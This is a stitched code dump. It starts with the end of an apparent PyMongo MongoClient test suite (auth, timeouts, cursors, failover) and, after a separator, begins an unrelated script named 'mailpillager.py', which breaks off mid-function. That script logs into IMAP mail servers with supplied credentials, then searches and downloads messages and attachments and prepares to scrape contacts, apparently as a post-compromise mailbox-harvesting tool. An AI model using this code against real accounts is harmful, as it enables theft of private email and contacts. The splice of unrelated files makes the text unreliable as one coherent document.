serverSelectionTimeoutMS=10))
def test_repr(self):
# Used to test 'eval' below.
import bson
client = MongoClient(
'mongodb://localhost:27017,localhost:27018/?replicaSet=replset'
'&connectTimeoutMS=12345&w=1&wtimeoutms=100',
connect=False, document_class=SON)
the_repr = repr(client)
self.assertIn('MongoClient(host=', the_repr)
self.assertIn(
"document_class=bson.son.SON, "
"tz_aware=False, "
"connect=False, ",
the_repr)
self.assertIn("connecttimeoutms=12345", the_repr)
self.assertIn("replicaset='replset'", the_repr)
self.assertIn("w=1", the_repr)
self.assertIn("wtimeoutms=100", the_repr)
self.assertEqual(eval(the_repr), client)
client = MongoClient("localhost:27017,localhost:27018",
replicaSet='replset',
connectTimeoutMS=12345,
socketTimeoutMS=None,
w=1,
wtimeoutms=100,
connect=False)
the_repr = repr(client)
self.assertIn('MongoClient(host=', the_repr)
self.assertIn(
"document_class=dict, "
"tz_aware=False, "
"connect=False, ",
the_repr)
self.assertIn("connecttimeoutms=12345", the_repr)
self.assertIn("replicaset='replset'", the_repr)
self.assertIn("sockettimeoutms=None", the_repr)
self.assertIn("w=1", the_repr)
self.assertIn("wtimeoutms=100", the_repr)
self.assertEqual(eval(the_repr), client)
@client_context.require_replica_set
def test_repr_replica_set(self):
self.assertIn("MongoClient(host=[", repr(self.client))
self.assertIn(pair, repr(self.client))
def test_getters(self):
self.assertEqual(client_context.client.address, (host, port))
self.assertEqual(client_context.nodes, self.client.nodes)
def test_database_names(self):
self.client.pymongo_test.test.insert_one({"dummy": u("object")})
self.client.pymongo_test_mike.test.insert_one({"dummy": u("object")})
dbs = self.client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_mike" in dbs)
def test_drop_database(self):
self.assertRaises(TypeError, self.client.drop_database, 5)
self.assertRaises(TypeError, self.client.drop_database, None)
self.client.pymongo_test.test.insert_one({"dummy": u("object")})
self.client.pymongo_test2.test.insert_one({"dummy": u("object")})
dbs = self.client.database_names()
self.assertIn("pymongo_test", dbs)
self.assertIn("pymongo_test2", dbs)
self.client.drop_database("pymongo_test")
self.client.drop_database(self.client.pymongo_test2)
raise SkipTest("This test often fails due to SERVER-2329")
dbs = self.client.database_names()
self.assertNotIn("pymongo_test", dbs)
self.assertNotIn("pymongo_test2", dbs)
def test_close(self):
coll = self.client.pymongo_test.bar
self.client.close()
self.client.close()
coll.count()
self.client.close()
self.client.close()
coll.count()
def test_bad_uri(self):
with self.assertRaises(InvalidURI):
MongoClient("http://localhost")
@client_context.require_auth
def test_auth_from_uri(self):
self.client.admin.add_user("admin", "pass", roles=["root"])
self.addCleanup(self.client.admin.remove_user, 'admin')
self.addCleanup(remove_all_users, self.client.pymongo_test)
self.client.pymongo_test.add_user(
"user", "pass", roles=['userAdmin', 'readWrite'])
with self.assertRaises(OperationFailure):
connected(rs_or_single_client(
"mongodb://a:b@%s:%d" % (host, port)))
# No error.
connected(rs_or_single_client_noauth(
"mongodb://admin:pass@%s:%d" % (host, port)))
# Wrong database.
uri = "mongodb://admin:pass@%s:%d/pymongo_test" % (host, port)
with self.assertRaises(OperationFailure):
connected(rs_or_single_client(uri))
# No error.
connected(rs_or_single_client_noauth(
"mongodb://user:pass@%s:%d/pymongo_test" % (host, port)))
# Auth with lazy connection.
rs_or_single_client(
"mongodb://user:pass@%s:%d/pymongo_test" % (host, port),
connect=False).pymongo_test.test.find_one()
# Wrong password.
bad_client = rs_or_single_client(
"mongodb://user:wrong@%s:%d/pymongo_test" % (host, port),
connect=False)
self.assertRaises(OperationFailure,
bad_client.pymongo_test.test.find_one)
@client_context.require_auth
def test_multiple_logins(self):
self.client.pymongo_test.add_user('user1', 'pass', roles=['readWrite'])
self.client.pymongo_test.add_user('user2', 'pass', roles=['readWrite'])
self.addCleanup(remove_all_users, self.client.pymongo_test)
client = rs_or_single_client_noauth(
"mongodb://user1:pass@%s:%d/pymongo_test" % (host, port))
client.pymongo_test.test.find_one()
with self.assertRaises(OperationFailure):
# Can't log in to the same database with multiple users.
client.pymongo_test.authenticate('user2', 'pass')
client.pymongo_test.test.find_one()
client.pymongo_test.logout()
with self.assertRaises(OperationFailure):
client.pymongo_test.test.find_one()
client.pymongo_test.authenticate('user2', 'pass')
client.pymongo_test.test.find_one()
with self.assertRaises(OperationFailure):
client.pymongo_test.authenticate('user1', 'pass')
client.pymongo_test.test.find_one()
@client_context.require_auth
def test_lazy_auth_raises_operation_failure(self):
lazy_client = rs_or_single_client(
"mongodb://user:wrong@%s/pymongo_test" % host, connect=False)
assertRaisesExactly(
OperationFailure, lazy_client.test.collection.find_one)
def test_unix_socket(self):
if not hasattr(socket, "AF_UNIX"):
raise SkipTest("UNIX-sockets are not supported on this system")
mongodb_socket = '/tmp/mongodb-27017.sock'
encoded_socket = '%2Ftmp%2Fmongodb-27017.sock'
if not os.access(mongodb_socket, os.R_OK):
raise SkipTest("Socket file is not accessible")
if client_context.auth_enabled:
uri = "mongodb://%s:%s@%s" % (db_user, db_pwd, encoded_socket)
else:
uri = "mongodb://%s" % encoded_socket
# Confirm we can do operations via the socket.
client = MongoClient(uri)
client.pymongo_test.test.insert_one({"dummy": "object"})
dbs = client.database_names()
self.assertTrue("pymongo_test" in dbs)
# Confirm it fails with a missing socket.
self.assertRaises(
ConnectionFailure,
connected, MongoClient("mongodb://%2Ftmp%2Fnon-existent.sock",
serverSelectionTimeoutMS=100))
def test_fork(self):
# Test using a client before and after a fork.
if sys.platform == "win32":
raise SkipTest("Can't fork on windows")
try:
import multiprocessing
except ImportError:
raise SkipTest("No multiprocessing module")
db = self.client.pymongo_test
# Ensure a socket is opened before the fork.
db.test.find_one()
def f(pipe):
try:
kill_cursors_executor = self.client._kill_cursors_executor
servers = self.client._topology.select_servers(
any_server_selector)
# In child, only the thread that called fork() is alive.
# The first operation should revive the rest.
db.test.find_one()
wait_until(
lambda: all(s._monitor._executor._thread.is_alive()
for s in servers),
"restart monitor threads")
wait_until(lambda: kill_cursors_executor._thread.is_alive(),
"restart kill-cursors executor")
except:
traceback.print_exc() # Aid debugging.
pipe.send(True)
parent_pipe, child_pipe = multiprocessing.Pipe()
p = multiprocessing.Process(target=f, args=(child_pipe,))
p.start()
p.join(10)
child_pipe.close()
# Pipe will only have data if the child process failed.
try:
parent_pipe.recv()
self.fail()
except EOFError:
pass
def test_document_class(self):
c = self.client
db = c.pymongo_test
db.test.insert_one({"x": 1})
self.assertEqual(dict, c.codec_options.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
c = rs_or_single_client(document_class=SON)
db = c.pymongo_test
self.assertEqual(SON, c.codec_options.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
def test_timeouts(self):
client = rs_or_single_client(connectTimeoutMS=10500)
self.assertEqual(10.5, get_pool(client).opts.connect_timeout)
client = rs_or_single_client(socketTimeoutMS=10500)
self.assertEqual(10.5, get_pool(client).opts.socket_timeout)
def test_socket_timeout_ms_validation(self):
c = rs_or_single_client(socketTimeoutMS=10 * 1000)
self.assertEqual(10, get_pool(c).opts.socket_timeout)
c = connected(rs_or_single_client(socketTimeoutMS=None))
self.assertEqual(None, get_pool(c).opts.socket_timeout)
self.assertRaises(ValueError,
rs_or_single_client, socketTimeoutMS=0)
self.assertRaises(ValueError,
rs_or_single_client, socketTimeoutMS=-1)
self.assertRaises(ValueError,
rs_or_single_client, socketTimeoutMS=1e10)
self.assertRaises(ValueError,
rs_or_single_client, socketTimeoutMS='foo')
def test_socket_timeout(self):
no_timeout = self.client
timeout_sec = 1
timeout = rs_or_single_client(socketTimeoutMS=1000 * timeout_sec)
no_timeout.pymongo_test.drop_collection("test")
no_timeout.pymongo_test.test.insert_one({"x": 1})
# A $where clause that takes a second longer than the timeout
where_func = delay(timeout_sec + 1)
def get_x(db):
doc = next(db.test.find().where(where_func))
return doc["x"]
self.assertEqual(1, get_x(no_timeout.pymongo_test))
self.assertRaises(NetworkTimeout, get_x, timeout.pymongo_test)
def test_server_selection_timeout(self):
client = MongoClient(serverSelectionTimeoutMS=100, connect=False)
self.assertAlmostEqual(0.1, client.server_selection_timeout)
client = MongoClient(serverSelectionTimeoutMS=0, connect=False)
self.assertAlmostEqual(0, client.server_selection_timeout)
self.assertRaises(ValueError, MongoClient,
serverSelectionTimeoutMS="foo", connect=False)
self.assertRaises(ValueError, MongoClient,
serverSelectionTimeoutMS=-1, connect=False)
self.assertRaises(ConfigurationError, MongoClient,
serverSelectionTimeoutMS=None, connect=False)
client = MongoClient(
'mongodb://localhost/?serverSelectionTimeoutMS=100', connect=False)
self.assertAlmostEqual(0.1, client.server_selection_timeout)
client = MongoClient(
'mongodb://localhost/?serverSelectionTimeoutMS=0', connect=False)
self.assertAlmostEqual(0, client.server_selection_timeout)
# Test invalid timeout in URI ignored and set to default.
client = MongoClient(
'mongodb://localhost/?serverSelectionTimeoutMS=-1', connect=False)
self.assertAlmostEqual(30, client.server_selection_timeout)
client = MongoClient(
'mongodb://localhost/?serverSelectionTimeoutMS=', connect=False)
self.assertAlmostEqual(30, client.server_selection_timeout)
def test_waitQueueTimeoutMS(self):
client = rs_or_single_client(waitQueueTimeoutMS=2000)
self.assertEqual(get_pool(client).opts.wait_queue_timeout, 2)
def test_waitQueueMultiple(self):
client = rs_or_single_client(maxPoolSize=3, waitQueueMultiple=2)
pool = get_pool(client)
self.assertEqual(pool.opts.wait_queue_multiple, 2)
self.assertEqual(pool._socket_semaphore.waiter_semaphore.counter, 6)
def test_socketKeepAlive(self):
client = rs_or_single_client(socketKeepAlive=True)
self.assertTrue(get_pool(client).opts.socket_keepalive)
def test_tz_aware(self):
self.assertRaises(ValueError, MongoClient, tz_aware='foo')
aware = rs_or_single_client(tz_aware=True)
naive = self.client
aware.pymongo_test.drop_collection("test")
now = datetime.datetime.utcnow()
aware.pymongo_test.test.insert_one({"x": now})
self.assertEqual(None, naive.pymongo_test.test.find_one()["x"].tzinfo)
self.assertEqual(utc, aware.pymongo_test.test.find_one()["x"].tzinfo)
self.assertEqual(
aware.pymongo_test.test.find_one()["x"].replace(tzinfo=None),
naive.pymongo_test.test.find_one()["x"])
@client_context.require_ipv6
def test_ipv6(self):
if client_context.auth_enabled:
auth_str = "%s:%s@" % (db_user, db_pwd)
else:
auth_str = ""
uri = "mongodb://%s[::1]:%d" % (auth_str, port)
if client_context.is_rs:
uri += '/?replicaSet=' + client_context.replica_set_name
client = rs_or_single_client_noauth(uri)
client.pymongo_test.test.insert_one({"dummy": u("object")})
client.pymongo_test_bernie.test.insert_one({"dummy": u("object")})
dbs = client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_bernie" in dbs)
@client_context.require_no_mongos
def test_fsync_lock_unlock(self):
if (server_is_master_with_slave(client_context.client) and
client_context.version.at_least(2, 3, 0)):
raise SkipTest('SERVER-7714')
self.assertFalse(self.client.is_locked)
# async flushing not supported on windows...
if sys.platform not in ('cygwin', 'win32'):
self.client.fsync(async=True)
self.assertFalse(self.client.is_locked)
self.client.fsync(lock=True)
self.assertTrue(self.client.is_locked)
locked = True
self.client.unlock()
for _ in range(5):
locked = self.client.is_locked
if not locked:
break
time.sleep(1)
self.assertFalse(locked)
def test_contextlib(self):
client = rs_or_single_client()
client.pymongo_test.drop_collection("test")
client.pymongo_test.test.insert_one({"foo": "bar"})
# The socket used for the previous commands has been returned to the
# pool
self.assertEqual(1, len(get_pool(client).sockets))
with contextlib.closing(client):
self.assertEqual("bar", client.pymongo_test.test.find_one()["foo"])
self.assertEqual(1, len(get_pool(client).sockets))
self.assertEqual(0, len(get_pool(client).sockets))
with client as client:
self.assertEqual("bar", client.pymongo_test.test.find_one()["foo"])
self.assertEqual(0, len(get_pool(client).sockets))
def test_interrupt_signal(self):
if sys.platform.startswith('java'):
# We can't figure out how to raise an exception on a thread that's
# blocked on a socket, whether that's the main thread or a worker,
# without simply killing the whole thread in Jython. This suggests
# PYTHON-294 can't actually occur in Jython.
raise SkipTest("Can't test interrupts in Jython")
# Test fix for PYTHON-294 -- make sure MongoClient closes its
# socket if it gets an interrupt while waiting to recv() from it.
db = self.client.pymongo_test
# A $where clause which takes 1.5 sec to execute
where = delay(1.5)
# Need exactly 1 document so find() will execute its $where clause once
db.drop_collection('foo')
db.foo.insert_one({'_id': 1})
def interrupter():
# Raises KeyboardInterrupt in the main thread
time.sleep(0.25)
thread.interrupt_main()
thread.start_new_thread(interrupter, ())
raised = False
try:
# Will be interrupted by a KeyboardInterrupt.
next(db.foo.find({'$where': where}))
except KeyboardInterrupt:
raised = True
# Can't use self.assertRaises() because it doesn't catch system
# exceptions
self.assertTrue(raised, "Didn't raise expected KeyboardInterrupt")
# Raises AssertionError due to PYTHON-294 -- Mongo's response to the
# previous find() is still waiting to be read on the socket, so the
# request id's don't match.
self.assertEqual(
{'_id': 1},
next(db.foo.find())
)
def test_operation_failure(self):
# Ensure MongoClient doesn't close socket after it gets an error
# response to getLastError. PYTHON-395.
pool = get_pool(self.client)
socket_count = len(pool.sockets)
self.assertGreaterEqual(socket_count, 1)
old_sock_info = next(iter(pool.sockets))
self.client.pymongo_test.test.drop()
self.client.pymongo_test.test.insert_one({'_id': 'foo'})
self.assertRaises(
OperationFailure,
self.client.pymongo_test.test.insert_one, {'_id': 'foo'})
self.assertEqual(socket_count, len(pool.sockets))
new_sock_info = next(iter(pool.sockets))
self.assertEqual(old_sock_info, new_sock_info)
def test_kill_cursors_with_cursoraddress(self):
if (client_context.is_mongos
and not client_context.version.at_least(2, 4, 7)):
# Old mongos sends incorrectly formatted error response when
# cursor isn't found, see SERVER-9738.
raise SkipTest("Can't test kill_cursors against old mongos")
self.collection = self.client.pymongo_test.test
self.collection.drop()
self.collection.insert_many([{'_id': i} for i in range(200)])
cursor = self.collection.find().batch_size(1)
next(cursor)
self.client.kill_cursors(
[cursor.cursor_id],
_CursorAddress(self.client.address, self.collection.full_name))
# Prevent killcursors from reaching the server while a getmore is in
# progress -- the server logs "Assertion: 16089:Cannot kill active
# cursor."
time.sleep(2)
def raises_cursor_not_found():
try:
next(cursor)
return False
except CursorNotFound:
return True
wait_until(raises_cursor_not_found, 'close cursor')
def test_kill_cursors_with_tuple(self):
if (client_context.is_mongos
and not client_context.version.at_least(2, 4, 7)):
# Old mongos sends incorrectly formatted error response when
# cursor isn't found, see SERVER-9738.
raise SkipTest("Can't test kill_cursors against old mongos")
self.collection = self.client.pymongo_test.test
self.collection.drop()
self.collection.insert_many([{'_id': i} for i in range(200)])
cursor = self.collection.find().batch_size(1)
next(cursor)
self.client.kill_cursors(
[cursor.cursor_id],
self.client.address)
# Prevent killcursors from reaching the server while a getmore is in
# progress -- the server logs "Assertion: 16089:Cannot kill active
# cursor."
time.sleep(2)
def raises_cursor_not_found():
try:
next(cursor)
return False
except CursorNotFound:
return True
wait_until(raises_cursor_not_found, 'close cursor')
def test_lazy_connect_w0(self):
# Ensure that connect-on-demand works when the first operation is
# an unacknowledged write. This exercises _writable_max_wire_version().
# Use a separate collection to avoid races where we're still
# completing an operation on a collection while the next test begins.
client = rs_or_single_client(connect=False, w=0)
client.test_lazy_connect_w0.test.insert_one({})
client = rs_or_single_client(connect=False)
client.test_lazy_connect_w0.test.update_one({}, {'$set': {'x': 1}})
client = rs_or_single_client(connect=False)
client.test_lazy_connect_w0.test.delete_one({})
@client_context.require_no_mongos
def test_exhaust_network_error(self):
# When doing an exhaust query, the socket stays checked out on success
# but must be checked in on error to avoid semaphore leaks.
client = rs_or_single_client(maxPoolSize=1)
collection = client.pymongo_test.test
pool = get_pool(client)
pool._check_interval_seconds = None # Never check.
# Ensure a socket.
connected(client)
# Cause a network error.
sock_info = one(pool.sockets)
sock_info.sock.close()
cursor = collection.find(cursor_type=CursorType.EXHAUST)
with self.assertRaises(ConnectionFailure):
next(cursor)
self.assertTrue(sock_info.closed)
# The semaphore was decremented despite the error.
self.assertTrue(pool._socket_semaphore.acquire(blocking=False))
@client_context.require_auth
def test_auth_network_error(self):
# Make sure there's no semaphore leak if we get a network error
# when authenticating a new socket with cached credentials.
# Get a client with one socket so we detect if it's leaked.
c = connected(rs_or_single_client(maxPoolSize=1,
waitQueueTimeoutMS=1))
# Simulate an authenticate() call on a different socket.
credentials = auth._build_credentials_tuple(
'DEFAULT', 'admin', db_user, db_pwd, {})
c._cache_credentials('test', credentials, connect=False)
# Cause a network error on the actual socket.
pool = get_pool(c)
socket_info = one(pool.sockets)
socket_info.sock.close()
# SocketInfo.check_auth logs in with the new credential, but gets a
# socket.error. Should be reraised as AutoReconnect.
self.assertRaises(AutoReconnect, c.test.collection.find_one)
# No semaphore leak, the pool is allowed to make a new socket.
c.test.collection.find_one()
@client_context.require_no_replica_set
def test_connect_to_standalone_using_replica_set_name(self):
client = MongoClient(pair, replicaSet='anything',
serverSelectionTimeoutMS=100)
with self.assertRaises(AutoReconnect):
client.test.test.find_one()
@client_context.require_replica_set
def test_stale_getmore(self):
# A cursor is created, but its member goes down and is removed from
# the topology before the getMore message is sent. Test that
# MongoClient._send_message_with_response handles the error.
with self.assertRaises(AutoReconnect):
client = MongoClient(host, port, connect=False,
serverSelectionTimeoutMS=100,
replicaSet=client_context.replica_set_name)
client._send_message_with_response(
operation=message._GetMore('pymongo_test', 'collection',
101, 1234, client.codec_options),
address=('not-a-member', 27017))
class TestExhaustCursor(IntegrationTest):
"""Test that clients properly handle errors from exhaust cursors."""
def setUp(self):
super(TestExhaustCursor, self).setUp()
if client_context.is_mongos:
raise SkipTest("mongos doesn't support exhaust, SERVER-2627")
# mongod < 2.2.0 closes exhaust socket on error, so it behaves like
# test_exhaust_query_network_error. Here we test that on query error
# the client correctly keeps the socket *open* and checks it in.
@client_context.require_version_min(2, 2, 0)
def test_exhaust_query_server_error(self):
# When doing an exhaust query, the socket stays checked out on success
# but must be checked in on error to avoid semaphore leaks.
client = connected(rs_or_single_client(maxPoolSize=1))
collection = client.pymongo_test.test
pool = get_pool(client)
sock_info = one(pool.sockets)
# This will cause OperationFailure in all mongo versions since
# the value for $orderby must be a document.
cursor = collection.find(
SON([('$query', {}), ('$orderby', True)]),
cursor_type=CursorType.EXHAUST)
self.assertRaises(OperationFailure, cursor.next)
self.assertFalse(sock_info.closed)
# The socket was checked in and the semaphore was decremented.
self.assertIn(sock_info, pool.sockets)
self.assertTrue(pool._socket_semaphore.acquire(blocking=False))
def test_exhaust_getmore_server_error(self):
# When doing a getmore on an exhaust cursor, the socket stays checked
# out on success but it's checked in on error to avoid semaphore leaks.
client = rs_or_single_client(maxPoolSize=1)
collection = client.pymongo_test.test
collection.drop()
collection.insert_many([{} for _ in range(200)])
self.addCleanup(client_context.client.pymongo_test.test.drop)
pool = get_pool(client)
pool._check_interval_seconds = None # Never check.
sock_info = one(pool.sockets)
cursor = collection.find(cursor_type=CursorType.EXHAUST)
# Initial query succeeds.
cursor.next()
# Cause a server error on getmore.
def receive_message(operation, request_id):
# Discard the actual server response.
SocketInfo.receive_message(sock_info, operation, request_id)
# responseFlags bit 1 is QueryFailure.
msg = struct.pack('<iiiii', 1 << 1, 0, 0, 0, 0)
msg += BSON.encode({'$err': 'mock err', 'code': 0})
return msg
saved = sock_info.receive_message
sock_info.receive_message = receive_message
self.assertRaises(OperationFailure, list, cursor)
sock_info.receive_message = saved
# The socket is returned the pool and it still works.
self.assertEqual(200, collection.count())
self.assertIn(sock_info, pool.sockets)
def test_exhaust_query_network_error(self):
# When doing an exhaust query, the socket stays checked out on success
# but must be checked in on error to avoid semaphore leaks.
client = connected(rs_or_single_client(maxPoolSize=1))
collection = client.pymongo_test.test
pool = get_pool(client)
pool._check_interval_seconds = None # Never check.
# Cause a network error.
sock_info = one(pool.sockets)
sock_info.sock.close()
cursor = collection.find(cursor_type=CursorType.EXHAUST)
self.assertRaises(ConnectionFailure, cursor.next)
self.assertTrue(sock_info.closed)
# The socket was closed and the semaphore was decremented.
self.assertNotIn(sock_info, pool.sockets)
self.assertTrue(pool._socket_semaphore.acquire(blocking=False))
def test_exhaust_getmore_network_error(self):
# When doing a getmore on an exhaust cursor, the socket stays checked
# out on success but it's checked in on error to avoid semaphore leaks.
client = rs_or_single_client(maxPoolSize=1)
collection = client.pymongo_test.test
collection.drop()
collection.insert_many([{} for _ in range(200)]) # More than one batch.
pool = get_pool(client)
pool._check_interval_seconds = None # Never check.
cursor = collection.find(cursor_type=CursorType.EXHAUST)
# Initial query succeeds.
cursor.next()
# Cause a network error.
sock_info = cursor._Cursor__exhaust_mgr.sock
sock_info.sock.close()
# A getmore fails.
self.assertRaises(ConnectionFailure, list, cursor)
self.assertTrue(sock_info.closed)
# The socket was closed and the semaphore was decremented.
self.assertNotIn(sock_info, pool.sockets)
self.assertTrue(pool._socket_semaphore.acquire(blocking=False))
class TestClientLazyConnect(IntegrationTest):
"""Test concurrent operations on a lazily-connecting MongoClient."""
def _get_client(self):
return rs_or_single_client(connect=False)
def test_insert_one(self):
def reset(collection):
collection.drop()
def insert_one(collection, _):
collection.insert_one({})
def test(collection):
self.assertEqual(NTHREADS, collection.count())
lazy_client_trial(reset, insert_one, test, self._get_client)
def test_update_one(self):
def reset(collection):
collection.drop()
collection.insert_one({'i': 0})
# Update doc 10 times.
def update_one(collection, _):
collection.update_one({}, {'$inc': {'i': 1}})
def test(collection):
self.assertEqual(NTHREADS, collection.find_one()['i'])
lazy_client_trial(reset, update_one, test, self._get_client)
def test_delete_one(self):
def reset(collection):
collection.drop()
collection.insert_many([{'i': i} for i in range(NTHREADS)])
def delete_one(collection, i):
collection.delete_one({'i': i})
def test(collection):
self.assertEqual(0, collection.count())
lazy_client_trial(reset, delete_one, test, self._get_client)
def test_find_one(self):
results = []
def reset(collection):
collection.drop()
collection.insert_one({})
results[:] = []
def find_one(collection, _):
results.append(collection.find_one())
def test(collection):
self.assertEqual(NTHREADS, len(results))
lazy_client_trial(reset, find_one, test, self._get_client)
def test_max_bson_size(self):
c = self._get_client()
# max_bson_size will cause the client to connect.
ismaster = c.db.command('ismaster')
self.assertEqual(ismaster['maxBsonObjectSize'], c.max_bson_size)
if 'maxMessageSizeBytes' in ismaster:
self.assertEqual(
ismaster['maxMessageSizeBytes'],
c.max_message_size)
class TestMongoClientFailover(MockClientTest):
def test_discover_primary(self):
# Disable background refresh.
with client_knobs(heartbeat_frequency=999999):
c = MockClient(
standalones=[],
members=['a:1', 'b:2', 'c:3'],
mongoses=[],
host='b:2', # Pass a secondary.
replicaSet='rs')
wait_until(lambda: len(c.nodes) == 3, 'connect')
self.assertEqual(c.address, ('a', 1))
# Fail over.
c.kill_host('a:1')
c.mock_primary = 'b:2'
c.close()
self.assertEqual(0, len(c.nodes))
t = c._get_topology()
t.select_servers(writable_server_selector) # Reconnect.
self.assertEqual(c.address, ('b', 2))
# a:1 not longer in nodes.
self.assertLess(len(c.nodes), 3)
# c:3 is rediscovered.
t.select_server_by_address(('c', 3))
def test_reconnect(self):
# Verify the node list isn't forgotten during a network failure.
c = MockClient(
standalones=[],
members=['a:1', 'b:2', 'c:3'],
mongoses=[],
host='b:2', # Pass a secondary.
replicaSet='rs')
wait_until(lambda: len(c.nodes) == 3, 'connect')
# Total failure.
c.kill_host('a:1')
c.kill_host('b:2')
c.kill_host('c:3')
# MongoClient discovers it's alone.
self.assertRaises(AutoReconnect, c.db.collection.find_one)
# But it can reconnect.
c.revive_host('a:1')
c._get_topology().select_servers(writable_server_selector)
self.assertEqual(c.address, ('a', 1))
def _test_network_error(self, operation_callback):
# Verify only the disconnected server is reset by a network failure.
# Disable background refresh.
with client_knobs(heartbeat_frequency=999999):
c = MockClient(
standalones=[],
members=['a:1', 'b:2'],
mongoses=[],
host='a:1',
replicaSet='rs',
connect=False)
# Set host-specific information so we can test whether it is reset.
c.set_wire_version_range('a:1', 0, 1)
c.set_wire_version_range('b:2', 0, 2)
c._get_topology().select_servers(writable_server_selector)
wait_until(lambda: len(c.nodes) == 2, 'connect')
c.kill_host('a:1')
# MongoClient is disconnected from the primary.
self.assertRaises(AutoReconnect, operation_callback, c)
# The primary's description is reset.
server_a = c._get_topology().get_server_by_address(('a', 1))
sd_a = server_a.description
self.assertEqual(SERVER_TYPE.Unknown, sd_a.server_type)
self.assertEqual(0, sd_a.min_wire_version)
self.assertEqual(0, sd_a.max_wire_version)
# ...but not the secondary's.
server_b = c._get_topology().get_server_by_address(('b', 2))
sd_b = server_b.description
self.assertEqual(SERVER_TYPE.RSSecondary, sd_b.server_type)
self.assertEqual(0, sd_b.min_wire_version)
self.assertEqual(2, sd_b.max_wire_version)
def test_network_error_on_query(self):
callback = lambda client: client.db.collection.find_one()
self._test_network_error(callback)
def test_network_error_on_insert(self):
callback = lambda client: client.db.collection.insert_one({})
self._test_network_error(callback)
def test_network_error_on_update(self):
callback = lambda client: client.db.collection.update_one(
{}, {'$unset': 'x'})
self._test_network_error(callback)
def test_network_error_on_replace(self):
callback = lambda client: client.db.collection.replace_one({}, {})
self._test_network_error(callback)
def test_network_error_on_delete(self):
callback = lambda client: client.db.collection.delete_many({})
self._test_network_error(callback)
if __name__ == "__main__":
unittest.main()
|
mailpillager.py
|
#!/usr/bin/env python3
import os
import imaplib
import poplib
import email.parser
import re
import ssl
from threading import Thread
#-----------------------------------------------------------------------------
# Primary Pillager Class that all others are sub classes of
# This really does nothing and is just a place holder
#-----------------------------------------------------------------------------
class Pillager():
def __init__(self, outputdir="."):
self.mailserver = None
self.port = None
self.srv = None
self.user = None
self.password = None
self.servertype = None
self.output_dir = outputdir
def getType(self):
return self.servertype
def connect(self, mailserver, port="0"):
self.mailserver = mailserver
self.port = port
self.srv = None
def disconnect(self):
return
def validate(self, user, password):
return False
def searchMessageBodies(self, term='ALL'):
return None
def searchMessageSubjects(self, term=None):
return None
def searchMessageAttachments(self, term=None):
return None
def downloadMessage(self, messageid=None):
return None
def downloadAttachment(self, messageid=None):
return None
def scrapeContacts(self):
return None
def getXsubjects(self, num=10):
return None
#-----------------------------------------------------------------------------
# IMAP subclass of Pillager Class
#-----------------------------------------------------------------------------
class IMAP(Pillager):
def __init__(self, outputdir="."):
Pillager.__init__(self, outputdir)
self.uids = None
def connect(self, mailserver, port="143"):
self.mailserver = mailserver
self.port = port
try:
self.srv = imaplib.IMAP4(self.mailserver)
except:
self.srv = None
pass
def disconnect(self):
if (self.srv):
self.srv.close()
self.srv.logout()
def validate(self, user, password):
if (not self.srv):
return
self.user = user
self.password = password
try:
self.srv.login(user, password)
except ssl.SSLError as e:
return False
except imaplib.IMAP4.error as e:
return False
return True
def searchMessageBodies(self, term=None):
if (not self.srv):
return
if (not term):
return
matched = []
self.srv.select(readonly=True)
search_term = self.buildSearchTerm("Body", term)
typ, data = self.srv.search(None, search_term)
for uid in data[0].split():
print("MATCHED ON [%s]" % (uid))
if not uid in matched:
matched.append(uid)
return matched
def searchMessageSubjects(self, term=None):
if (not self.srv):
return
if (not term):
return
matched = []
self.srv.select(readonly=True)
search_term = self.buildSearchTerm("Subject", term)
typ, data = self.srv.search(None, search_term)
for uid in data[0].split():
header = self.srv.fetch(uid, '(BODY[HEADER])')
if (header):
header_data = header[1][0][1]
parser = email.parser.HeaderParser()
msg = parser.parsestr(header_data.decode())
print("#%s [%s] -> [%s]" %(uid, msg['from'], msg['subject']))
if not uid in matched:
matched.append(uid)
return matched
def searchMessageAttachments(self, term=None):
if (not self.srv):
return
self.getUIDs()
if (not self.uids):
return None
matched = []
for uid in self.uids:
resp, data = self.srv.fetch(uid, "(RFC822)") # fetching the mail, "`(RFC822)`" means "get the whole stuff", but you can ask for headers only, etc
email_body = data[0][1] # getting the mail content
mail = email.message_from_string(email_body.decode()) # parsing the mail content to get a mail object
#Check if any attachments at all
if mail.get_content_maintype() != 'multipart':
continue
print("["+mail["From"]+"] :" + mail["Subject"])
# we use walk to create a generator so we can iterate on the parts and forget about the recursive headach
for part in mail.walk():
# multipart are just containers, so we skip them
if part.get_content_maintype() == 'multipart':
continue
# is this part an attachment ?
if part.get('Content-Disposition') is None:
continue
filename = part.get_filename()
print("Found attachment [%s]" % (filename))
valid = False
if (term):
for search_term in term:
if re.match(search_term, filename, re.IGNORECASE):
print("MATCHED ON [%s]" % (search_term))
valid = True
else:
valid = True
if valid:
print("Filename [%s] MATCHED search terms for uid [%s]" % (filename, uid))
if not uid in matched:
matched.append(uid)
return matched
def downloadMessage(self, messageid=None):
if (not self.srv):
return
if messageid:
resp, data = self.srv.fetch(messageid, "(RFC822)") # fetching the mail, "`(RFC822)`" means "get the whole stuff", but you can ask for headers only, etc
email_body = data[0][1] # getting the mail content
filename = self.user + "_" + messageid.decode()
file_path = os.path.join(self.output_dir, filename)
print("Downloading message id [%s] to [%s]" % (messageid, file_path))
#Check if its already there
if not os.path.isfile(file_path) :
# finally write the stuff
fp = open(file_path, 'wb')
fp.write(email_body)
fp.close()
return None
def downloadAttachment(self, messageid=None):
if (not self.srv):
return
if messageid:
resp, data = self.srv.fetch(messageid, "(RFC822)") # fetching the mail, "`(RFC822)`" means "get the whole stuff", but you can ask for headers only, etc
email_body = data[0][1] # getting the mail content
mail = email.message_from_string(email_body) # parsing the mail content to get a mail object
#Check if any attachments at all
if mail.get_content_maintype() != 'multipart':
return
# we use walk to create a generator so we can iterate on the parts and forget about the recursive headach
for part in mail.walk():
# multipart are just containers, so we skip them
if part.get_content_maintype() == 'multipart':
continue
# is this part an attachment ?
if part.get('Content-Disposition') is None:
continue
filename = part.get_filename()
if (not filename):
continue
file_path = os.path.join(self.output_dir, filename)
print("Downloading attachment [%s] to [%s]" % (messageid, file_path))
#Check if its already there
if not os.path.isfile(file_path) :
# finally write the stuff
fp = open(file_path, 'wb')
fp.write(part.get_payload(decode=True))
fp.close()
return
def scrapeContacts(self):
if (not self.srv):
return
